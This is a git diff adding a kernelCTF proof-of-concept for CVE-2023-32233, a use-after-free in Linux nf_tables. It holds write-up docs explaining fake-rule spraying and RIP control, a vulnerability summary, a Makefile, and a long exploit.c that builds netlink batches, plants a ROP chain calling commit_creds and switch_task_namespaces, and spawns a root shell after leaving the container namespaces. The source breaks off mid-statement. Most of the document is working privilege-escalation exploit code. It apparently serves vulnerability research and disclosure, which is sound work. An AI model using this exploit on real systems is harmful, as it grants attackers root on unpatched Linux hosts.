+We create a fake rule to control RIP. Since `expr->ops->deactivate` is called in the `nft_rule_expr_deactivate` function when deleting a rule [7], we can control RIP by replacing the address of the ops.
+
+```c
+static void nft_rule_expr_deactivate(const struct nft_ctx *ctx,
+                                     struct nft_rule *rule,
+                                     enum nft_trans_phase phase)
+{
+    struct nft_expr *expr;
+
+    expr = nft_expr_first(rule);
+    while (nft_expr_more(rule, expr)) {
+        if (expr->ops->deactivate)
+            expr->ops->deactivate(ctx, expr, phase); // [7]
+
+        expr = nft_expr_next(expr);
+    }
+}
+```
+
+To do this, we free the rule we sprayed for the leak and spray a fake rule with chain->udata at this location.
+
+```c
+    struct fake_nft_rule * payload = (struct fake_nft_rule *) data;
+
+    payload->dlen = 8;
+    payload->genmask = 0;
+    payload->handle = 0xffff;
+    payload->list.prev = (void*) 0;
+    payload->list.next = (void*) 0;
+
+    *((uint64_t*)data + (sizeof(struct fake_nft_rule) / sizeof(uint64_t*))) = heap_addr; // expr->ops
+```
+
+I sprayed a fake rule with `dlen` greater than `0` and `handle` `0xffff`. When I then delete the rule with handle `0xffff`, RIP is controlled.
+
+# Post-RIP
+
+I use the following ROP payload to get the shell. For simplicity, I utilized the Telefork technique suggested by Kyle (https://blog.kylebot.net/2022/10/16/CVE-2022-1786/).
+
+```c
+void make_payload_rop(uint64_t* data){
+    int i = 0;
+
+    data[i++] = kbase + POP_RSI_RET; // dummy
+    data[i++] = 0;
+
+    data[i++] = kbase + POP_RSI_RET; // dummy
+    data[i++] = 0;
+
+    data[i++] = kbase + POP_RSI_RET; // dummy
+    data[i++] = kbase + PUSH_RAX_POP_RSP; // expr->ops->deactivate()
+
+    // find_task_by_vpid(1)
+    data[i++] = kbase + POP_RDI_RET;
+    data[i++] = 1;
+    data[i++] = kbase + FIND_TASK_BY_VPID;
+
+    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
+    data[i++] = kbase + MOV_RDI_RAX_RET;
+    data[i++] = kbase + POP_RSI_RET;
+    data[i++] = kbase + INIT_NSPROXY;
+    data[i++] = kbase + SWITCH_TASK_NAMESPACES;
+
+    // commit_creds(&init_cred)
+    data[i++] = kbase + POP_RDI_RET;
+    data[i++] = kbase + INIT_CRED;
+    data[i++] = kbase + COMMIT_CREDS;
+
+    data[i++] = kbase + VFORK;
+    data[i++] = kbase + DELAY;
+}
+```
+
+However, when using the `fork` system call, a lot of double fault exceptions occurred, so we used `vfork`. Since `vfork` can also cause a double fault exception, it would be even better to use an `iret` gadget to return to userspace and increase the reliability of the exploit.
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/novel-techniques.md
new file mode 100644
index 00000000..385b0010
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/novel-techniques.md
@@ -0,0 +1,23 @@
+# Novel Techniques
+
+## Powerful Universal Object: `struct nft_rule`
+
+`struct nft_rule` is a very powerful primitive that can be used for KASLR bypasses, heap address leaks, RIP control, and data spraying. We can get the kernel base address by reading the ops pointer of an expr stored in an `nft_rule`. We can also read the list of the `nft_rule` and the heap address stored in the nft_expr, and utilize them in an attack. Finally, the ops address of the expr can be manipulated to perform RIP control. Additionally, the userdata field of the `nft_rule` can be used for data spraying.
+
+```c
+struct nft_rule {
+    struct list_head list;
+    u64 handle:42,
+        genmask:2,
+        dlen:12,
+        udata:1;
+    unsigned char data[]
+        __attribute__((aligned(__alignof__(struct nft_expr))));
+};
+
+struct nft_expr {
+    const struct nft_expr_ops *ops;
+    unsigned char data[]
+        __attribute__((aligned(__alignof__(u64))));
+};
+```
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/vulnerability.md
new file mode 100644
index 00000000..be67b089
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/vulnerability.md
@@ -0,0 +1,12 @@
+- Requirements:
+    - Capabilities: CAP_NET_ADMIN
+    - Kernel configuration: CONFIG_NETFILTER, CONFIG_NF_TABLES
+    - User namespaces required: Yes
+- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=20a69341f2d00cd042e81c82289fba8a13c05a25 (netfilter: nf_tables: add netlink set API)
+- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c1592a89942e9678f7d9c8030efa777c0d57edab (netfilter: nf_tables: deactivate anonymous set from preparation phase)
+- Affected Version: v3.13-rc1 - v6.4-rc6
+- Affected Component: net/netfilter
+- Cause: Use-After-Free
+- Syscall to disable: disallow unprivileged user namespaces
+- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32233
+- Description: In the Linux kernel through 6.3.1, a use-after-free in Netfilter nf_tables when processing batch requests can be abused to perform arbitrary read and write operations on kernel memory. Unprivileged local users can obtain root privileges. This occurs because anonymous sets are mishandled.
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/Makefile b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/Makefile
new file mode 100644
index 00000000..2d064e70
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/Makefile
@@ -0,0 +1,35 @@
+LIBMNL_DIR = $(realpath ./)/libmnl_build
+LIBNFTNL_DIR = $(realpath ./)/libnftnl_build
+
+exploit:
+	gcc -o exploit exploit.c -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl -I$(LIBNFTNL_DIR)/install/include -I$(LIBMNL_DIR)/install/include -static
+
+prerequisites: libmnl-build libnftnl-build
+
+libmnl-build : libmnl-download
+	tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install`
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && make
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install
+
+libnftnl-build : libmnl-build libnftnl-download
+	tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz
+	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install`
+	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make
+	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install
+
+libmnl-download :
+	mkdir $(LIBMNL_DIR)
+	wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2
+
+libnftnl-download :
+	mkdir $(LIBNFTNL_DIR)
+	wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz
+
+run:
+	./exploit
+
+clean:
+	rm -rf $(LIBMNL_DIR)
+	rm -rf $(LIBNFTNL_DIR)
+	rm -f exploit
\ No newline at 
diff --git a/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/exploit b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/exploit
new file mode 100755
index 00000000..d175430c
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/exploit.c b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/exploit.c
new file mode 100644
index 00000000..18bd99f4
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/exploit.c
@@ -0,0 +1,1542 @@
+#define _GNU_SOURCE
+
+/* NOTE: include list reconstructed from the APIs used below. */
+#include <errno.h>
+#include <err.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <sched.h>
+#include <setjmp.h>
+#include <signal.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+#include <unistd.h>
+
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#include <linux/netlink.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter/nf_tables.h>
+
+#include <libmnl/libmnl.h>
+#include <libnftnl/common.h>
+#include <libnftnl/table.h>
+#include <libnftnl/chain.h>
+#include <libnftnl/rule.h>
+#include <libnftnl/set.h>
+#include <libnftnl/expr.h>
+
+
+uint64_t cfg_race_set_slab = 1;
+uint64_t cfg_race_set_elem_count = 0x300 * 0x800;
+
+useconds_t cfg_initial_usleep = 1 * 1000 * 1000;
+useconds_t cfg_race_lead_usleep = 50 * 1000;
+useconds_t cfg_race_lag_usleep = 300 * 1000;
+useconds_t cfg_reuse_usleep = 50 * 1000;
+
+
+#define FIND_TASK_BY_VPID 0x10a0d0
+#define SWITCH_TASK_NAMESPACES 0x111c80
+#define COMMIT_CREDS 0x1136f0
+#define INIT_NSPROXY 0x2661680
+#define INIT_CRED 0x26618c0
+#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0x12010c6
+#define VFORK 0x0e37d0
+#define DELAY 0x17da60
+#define NFT_COUNTER_OPS 0x1af8340
+
+#define PUSH_RAX_POP_RSP 0xaec248 // 0xffffffff81aec248 : push rax ; pop rsp ; xor eax, eax ; jmp 0xffffffff82404440
+#define POP_RDI_RET 0x1481f3 // 0xffffffff811481f3 : pop rdi ; jmp 0xffffffff82404440
+#define POP_RSI_RET 0x0d813f // 0xffffffff810d813f : pop rsi ; jmp 0xffffffff82404440
+#define MOV_RDI_RAX_RET 0x61dd6a // 0xffffffff8161dd6a : mov rdi, rax ; mov dword ptr [rdx], ecx ; mov rax, rdi ; jmp 0xffffffff82404440
+#define POP_RDX_RET 0x6f12a0 // 0xffffffff816f12a0 : pop rdx ; xor eax, eax ; jmp 0xffffffff82404440
+
+#define uaf_chunk_size 0x80
+#define mnl_batch_limit (1024 * 1024)
+
+uint64_t nft_counter_ops;
+uint64_t kbase;
+uint64_t heap_addr;
+uint64_t victim_rule_handle;
+
+char mnl_batch_buffer[2 * mnl_batch_limit];
+
+char uaf_set_key[8 + 0x34];
+
+void win(){
+    setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
+    setns(open("/proc/1/ns/pid", O_RDONLY), 0);
+    setns(open("/proc/1/ns/net", O_RDONLY), 0);
+
+    system("cat /flag");
+
+    char *args[] = {"/bin/sh", NULL};
+    execve("/bin/sh", args, NULL);
+
+    exit(0);
+}
+
+int cfg_load_line(char *line)
+{
+    char *saveptr = NULL;
+    char *value = strtok_r(line, "\t ", &saveptr);
+    if (value == NULL) {
+        return EFAULT;
+    }
+
+    char *key = NULL;
+    do {
+        key = strtok_r(NULL, "\t\n ", &saveptr);
+        if (key == NULL) {
+            return EFAULT;
+        }
+    } while (strlen(key) < 2);
+
+    errno = 0;
+
+    if (strcmp(key, "race_set_slab") == 0) {
+        cfg_race_set_slab = strtoul(value, NULL, 0);
+    }
+    else if (strcmp(key, "race_set_elem_count") == 0) {
+        cfg_race_set_elem_count = 1000L * strtoul(value, NULL, 0);
+    }
+    else if (strcmp(key, "initial_sleep") == 0) {
+        cfg_initial_usleep = 1000L * strtoul(value, NULL, 0);
+    }
+    else if (strcmp(key, "race_lead_sleep") == 0) {
+        cfg_race_lead_usleep = 1000L * strtoul(value, NULL, 0);
+    }
+    else if (strcmp(key, "race_lag_sleep") == 0) {
+        cfg_race_lag_usleep = 1000L * strtoul(value, NULL, 0);
+    }
+    else if (strcmp(key, "reuse_sleep") == 0) {
+        cfg_reuse_usleep = 1000L * strtoul(value, NULL,
0); + } + else { + errno = ENOENT; + } + + return errno; +} + +static void cfg_load(char *path) +{ + FILE *stream = fopen(path, "r"); + if (stream != NULL) { + char *line = NULL; + size_t len = 0; + ssize_t nread; + + while ((nread = getline(&line, &len, stream)) != -1) { + printf("[*] Profile line: %s", line); + if (cfg_load_line(line) != 0) { + printf("[!] ERROR\n"); + } + } + fclose(stream); + } +} + +void hex_dump(const char *data, ssize_t size) +{ + if (size <= 0) { + printf("\n*** empty ***\n"); + } + else { + char hex_buf[0x40]; + char ascii_buf[0x20]; + ssize_t ix = 0; + int pos = 0; + + do { + unsigned char byte = data[ix]; + + sprintf(hex_buf + 3 * pos, "%02x ", byte); + ascii_buf[pos] = ((0x20 <= byte) && (byte < 0x7e))? byte: '.'; + + ++ ix; + ++ pos; + if ((ix == size) || (pos == 0x10)) { + ascii_buf[pos] = 0; + printf("\n%04lx: %-48s | %s", ix - pos, hex_buf, ascii_buf); + pos = 0; + } + } while (ix < size); + printf("\n"); + } +} + +static void append_del_set_handle(struct mnl_nlmsg_batch *batch, uint32_t seq, + uint32_t family, char *table_name, uint64_t handle) +{ + struct nftnl_set *set = nftnl_set_alloc(); + if (set == NULL) { + errx(1, "Cannot into nftnl_set_alloc()"); + } + + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family); + nftnl_set_set_str(set, NFTNL_SET_TABLE, table_name); + nftnl_set_set_u64(set, NFTNL_SET_HANDLE, handle); + + struct nlmsghdr *nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELSET, + NFPROTO_INET, + NLM_F_ACK, + seq + ); + nftnl_set_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + nftnl_set_free(set); +} + +static void append_del_set(struct mnl_nlmsg_batch *batch, uint32_t seq, + uint32_t family, char *table_name, char *set_name) +{ + struct nftnl_set *set = nftnl_set_alloc(); + if (set == NULL) { + errx(1, "Cannot into nftnl_set_alloc()"); + } + + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family); + nftnl_set_set_str(set, NFTNL_SET_TABLE, table_name); + nftnl_set_set_str(set, NFTNL_SET_NAME, set_name); + + struct nlmsghdr *nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELSET, + NFPROTO_INET, + NLM_F_ACK, + seq + ); + nftnl_set_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + nftnl_set_free(set); +} + +static void append_del_chain(struct mnl_nlmsg_batch *batch, uint32_t seq, + uint32_t family, char *table_name, char *chain_name) +{ + struct nftnl_chain *chain = nftnl_chain_alloc(); + if (chain == NULL) { + errx(1, "Cannot into nftnl_chain_alloc()"); + } + + nftnl_chain_set_u32(chain, NFTNL_CHAIN_FAMILY, family); + nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, table_name); + nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); + + struct nlmsghdr *nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELCHAIN, + NFPROTO_INET, + 0, + seq + ); + nftnl_chain_nlmsg_build_payload(nlh, chain); + mnl_nlmsg_batch_next(batch); + + nftnl_chain_free(chain); +} + +static void append_del_rule(struct mnl_nlmsg_batch *batch, uint32_t seq, + uint32_t family, char *table_name, char *chain_name, uint64_t rule_handle) +{ + struct nftnl_rule *rule = nftnl_rule_alloc(); + if (rule == NULL) { + errx(1, "Cannot into nftnl_rule_alloc()"); + } + + nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, table_name); + nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name); + nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, family); + if (rule_handle != -1) { + nftnl_rule_set_u64(rule, NFTNL_RULE_HANDLE, rule_handle); + } + + struct nlmsghdr *nlh = 
nftnl_rule_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELRULE, + family, + NLM_F_ACK, + seq + ); + nftnl_rule_nlmsg_build_payload(nlh, rule); + mnl_nlmsg_batch_next(batch); + + nftnl_rule_free(rule); +} + + +uint32_t pwn_family = NFPROTO_INET; +char *pwn_table = "testfirewall"; + +char *pwn_lookup_set = "s_a"; +char *pwn_lookup_chain = "OUTPUT"; + +char *pwn_log_chain = "INPUT"; + +static void pwn_create_table(struct mnl_nlmsg_batch *batch, uint32_t seq) +{ + struct nftnl_table *table = nftnl_table_alloc(); + if (table == NULL) { + errx(1, "Cannot into nftnl_table_alloc()"); + } + + nftnl_table_set_u32(table, NFTNL_TABLE_FAMILY, pwn_family); + nftnl_table_set_str(table, NFTNL_TABLE_NAME, pwn_table); + + struct nlmsghdr *nlh = nftnl_table_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWTABLE, + pwn_family, + NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_table_nlmsg_build_payload(nlh, table); + mnl_nlmsg_batch_next(batch); + + nftnl_table_free(table); +} + + +static void pwn_create_set(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *set_name, uint32_t set_id, uint32_t set_flags, + uint32_t set_key_len, uint32_t set_desc_size, + void *set_userdata, uint32_t set_userdata_len) +{ + struct nftnl_set *set = nftnl_set_alloc(); + if (set == NULL) { + errx(1, "Cannot into nftnl_set_alloc()"); + } + + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, pwn_family); + nftnl_set_set_str(set, NFTNL_SET_TABLE, pwn_table); + nftnl_set_set_str(set, NFTNL_SET_NAME, set_name); + nftnl_set_set_u32(set, NFTNL_SET_ID, set_id); + nftnl_set_set_u32(set, NFTNL_SET_FLAGS, set_flags); + nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, set_key_len); + if (set_desc_size != 0) { + nftnl_set_set_u32(set, NFTNL_SET_DESC_SIZE, set_desc_size); + } + if (set_userdata != NULL) { + nftnl_set_set_data(set, NFTNL_SET_USERDATA, set_userdata, set_userdata_len); + } + + struct nlmsghdr *nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSET, + pwn_family, + NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_set_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + nftnl_set_free(set); +} + + +static void pwn_create_chain(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *chain_name) +{ + struct nftnl_chain *chain = nftnl_chain_alloc(); + if (chain == NULL) { + errx(1, "Cannot into nftnl_chain_alloc()"); + } + + nftnl_chain_set_u32(chain, NFTNL_CHAIN_FAMILY, pwn_family); + nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, pwn_table); + nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); + + struct nlmsghdr *nlh = nftnl_chain_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWCHAIN, + pwn_family, + NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_chain_nlmsg_build_payload(nlh, chain); + mnl_nlmsg_batch_next(batch); + + nftnl_chain_free(chain); +} + + +static void pwn_create_lookup_set_elem(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *set_name, + void *set_elem_key, uint32_t set_elem_key_len) +{ + char set_elem_userdata[0x2f] = {}; + + struct nftnl_set *set = nftnl_set_alloc(); + if (set == NULL) { + errx(1, "Cannot into nftnl_set_alloc()"); + } + + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, pwn_family); + nftnl_set_set_str(set, NFTNL_SET_TABLE, pwn_table); + nftnl_set_set_str(set, NFTNL_SET_NAME, set_name); + + struct nftnl_set_elem *set_elem = nftnl_set_elem_alloc(); + if (set_elem == NULL) { + errx(1, "Cannot into nftnl_set_elem_alloc()"); + } + + nftnl_set_elem_set(set_elem, NFTNL_SET_ELEM_KEY, set_elem_key, set_elem_key_len); + nftnl_set_elem_set(set_elem, 
NFTNL_SET_ELEM_USERDATA, set_elem_userdata, sizeof(set_elem_userdata)); + + nftnl_set_elem_add(set, set_elem); + + struct nlmsghdr *nlh = nftnl_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSETELEM, + NFPROTO_INET, + NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK, + seq + ); + nftnl_set_elems_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + nftnl_set_free(set); +} + + +static void pwn_create_lookup_rule(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *chain_name, char *set_name) +{ + struct nftnl_rule *rule = nftnl_rule_alloc(); + if (rule == NULL) { + errx(1, "Cannot into nftnl_rule_alloc()"); + } + + nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, pwn_family); + nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, pwn_table); + nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name); + + struct nftnl_expr *lookup = nftnl_expr_alloc("lookup"); + if (lookup == NULL) { + errx(1, "Cannot into nftnl_expr_alloc()"); + } + + nftnl_expr_set_u32(lookup, NFTNL_EXPR_LOOKUP_SREG, NFT_REG_1); + nftnl_expr_set_str(lookup, NFTNL_EXPR_LOOKUP_SET, set_name); + nftnl_expr_set_u32(lookup, NFTNL_EXPR_LOOKUP_FLAGS, 0); + + nftnl_rule_add_expr(rule, lookup); + + struct nlmsghdr *nlh = nftnl_rule_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWRULE, + pwn_family, + NLM_F_APPEND | NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_rule_nlmsg_build_payload(nlh, rule); + mnl_nlmsg_batch_next(batch); + + nftnl_rule_free(rule); +} + +static void pwn_create_leak_rule(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *chain_name) +{ + char rule_userdata[0xa0] = {'a',}; + + struct nftnl_rule *rule = nftnl_rule_alloc(); + if (rule == NULL) { + errx(1, "Cannot into nftnl_rule_alloc()"); + } + + nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, pwn_family); + nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, pwn_table); + nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name); + nftnl_rule_set_data(rule, NFTNL_RULE_USERDATA, rule_userdata, sizeof(rule_userdata)); + + struct nftnl_expr *expr = nftnl_expr_alloc("counter"); + if (expr == NULL) { + errx(1, "Cannot into nftnl_expr_alloc()"); + } + + nftnl_rule_add_expr(rule, expr); + + struct nlmsghdr *nlh = nftnl_rule_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWRULE, + pwn_family, + NLM_F_APPEND | NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_rule_nlmsg_build_payload(nlh, rule); + mnl_nlmsg_batch_next(batch); + + nftnl_rule_free(rule); +} + +static void pwn_create_leak_chain(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *chain_name) +{ + struct nftnl_chain *chain = nftnl_chain_alloc(); + if (chain == NULL) { + errx(1, "Cannot into nftnl_chain_alloc()"); + } + + char data[0x200] = {0,}; + + nftnl_chain_set_u32(chain, NFTNL_CHAIN_FAMILY, pwn_family); + nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, pwn_table); + nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); + nftnl_chain_set_data(chain, NFTNL_CHAIN_USERDATA, data, 0xf0); + + struct nlmsghdr *nlh = nftnl_chain_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWCHAIN, + pwn_family, + NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_chain_nlmsg_build_payload(nlh, chain); + mnl_nlmsg_batch_next(batch); + + nftnl_chain_free(chain); +} + +struct list_head { + struct list_head *next, *prev; +}; + +struct fake_nft_rule { + struct list_head list; + uint64_t handle:42, + genmask:2, + dlen:12, + udata:1; +}; + +void make_payload_rop(uint64_t* data){ + int i = 0; + + data[i++] = kbase + POP_RSI_RET; + data[i++] = 0; + + data[i++] = kbase + POP_RSI_RET; + data[i++] = 0; + + 
data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + PUSH_RAX_POP_RSP; // expr->ops->deactivate() + + // find_task_by_vpid(1) + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + FIND_TASK_BY_VPID; + + // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) + data[i++] = kbase + MOV_RDI_RAX_RET; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + INIT_NSPROXY; + data[i++] = kbase + SWITCH_TASK_NAMESPACES; + + // commit_creds(&init_cred) + data[i++] = kbase + POP_RDI_RET; + data[i++] = kbase + INIT_CRED; + data[i++] = kbase + COMMIT_CREDS; + + data[i++] = kbase + VFORK; + data[i++] = kbase + DELAY; +} + +static void pwn_create_rop_chain(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *chain_name) +{ + struct nftnl_chain *chain = nftnl_chain_alloc(); + if (chain == NULL) { + errx(1, "Cannot into nftnl_chain_alloc()"); + } + + uint64_t data[0x100] = {0,}; + make_payload_rop(data); + + data[5] = kbase + PUSH_RAX_POP_RSP; + + nftnl_chain_set_u32(chain, NFTNL_CHAIN_FAMILY, pwn_family); + nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, pwn_table); + nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); + nftnl_chain_set_data(chain, NFTNL_CHAIN_USERDATA, data, 0xf0); + + struct nlmsghdr *nlh = nftnl_chain_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWCHAIN, + pwn_family, + NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_chain_nlmsg_build_payload(nlh, chain); + mnl_nlmsg_batch_next(batch); + + nftnl_chain_free(chain); +} + +static void pwn_create_fake_rule_chain(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *chain_name) +{ + struct nftnl_chain *chain = nftnl_chain_alloc(); + if (chain == NULL) { + errx(1, "Cannot into nftnl_chain_alloc()"); + } + + char data[0x200] = {0,}; + + memset(data, 'c', 0x100); + + struct fake_nft_rule * payload = (struct fake_nft_rule *) data; + + payload->dlen = 8; + payload->genmask = 0; + payload->handle = 0xffff; + payload->list.prev = (void*) 0; + payload->list.next = (void*) 0; + + *((uint64_t*)data + (sizeof(struct fake_nft_rule) / sizeof(uint64_t*))) = heap_addr; + + nftnl_chain_set_u32(chain, NFTNL_CHAIN_FAMILY, pwn_family); + nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, pwn_table); + nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); + nftnl_chain_set_data(chain, NFTNL_CHAIN_USERDATA, data, 0xf0); + + struct nlmsghdr *nlh = nftnl_chain_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWCHAIN, + pwn_family, + NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_chain_nlmsg_build_payload(nlh, chain); + mnl_nlmsg_batch_next(batch); + + nftnl_chain_free(chain); +} + +static void pwn_prepare(struct mnl_socket *nl) +{ + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_prepare\n"); + + seq = time(NULL); + + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + pwn_create_table(batch, seq++); + + pwn_create_chain(batch, seq++, pwn_lookup_chain); + + pwn_create_chain(batch, seq++, pwn_log_chain); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "Cannot into mnl_socket_sendto()"); + } + + mnl_nlmsg_batch_stop(batch); + + while (table_seq + 1 != seq) { + ret = mnl_socket_recvfrom(nl, mnl_batch_buffer, mnl_batch_limit); + if (ret <= 0) + break; + ret = 
mnl_cb_run(mnl_batch_buffer, ret, table_seq, portid, NULL, NULL); + if (ret < 0) + break; + table_seq++; + } + if (ret == -1) { + err(1, "Cannot into mnl_socket_recvfrom()"); + } +} + +static void pwn_uaf_spray(struct mnl_socket *nl) +{ + uint32_t portid, seq, table_seq; + int ret; + + printf("pwn_uaf_spray\n"); + + memset(uaf_set_key, 0, sizeof(uaf_set_key)); + uaf_set_key[4] = 0x90; + + char set_userdata_buf[0x100] = {}; + + char *set_userdata; + uint32_t set_userdata_size; + if (cfg_race_set_slab == 0) { + set_userdata = NULL; + set_userdata_size = 0; + } + else { + set_userdata = set_userdata_buf; + set_userdata_size = sizeof(set_userdata_buf); + } + + seq = time(NULL); + + struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + table_seq = seq; + mnl_nlmsg_batch_next(batch); + + for (int spray = - 0x50; spray < 10; ++ spray) { + if (spray == 0) { + pwn_create_set(batch, seq++, pwn_lookup_set, spray, NFT_SET_ANONYMOUS, sizeof(uaf_set_key), 0, set_userdata, set_userdata_size); + } + else { + char *set_name; + asprintf(&set_name, "spray_set_%04hx", spray); + pwn_create_set(batch, seq++, set_name, spray, NFT_SET_ANONYMOUS, sizeof(uaf_set_key), 0, set_userdata, set_userdata_size); + } + } + + for 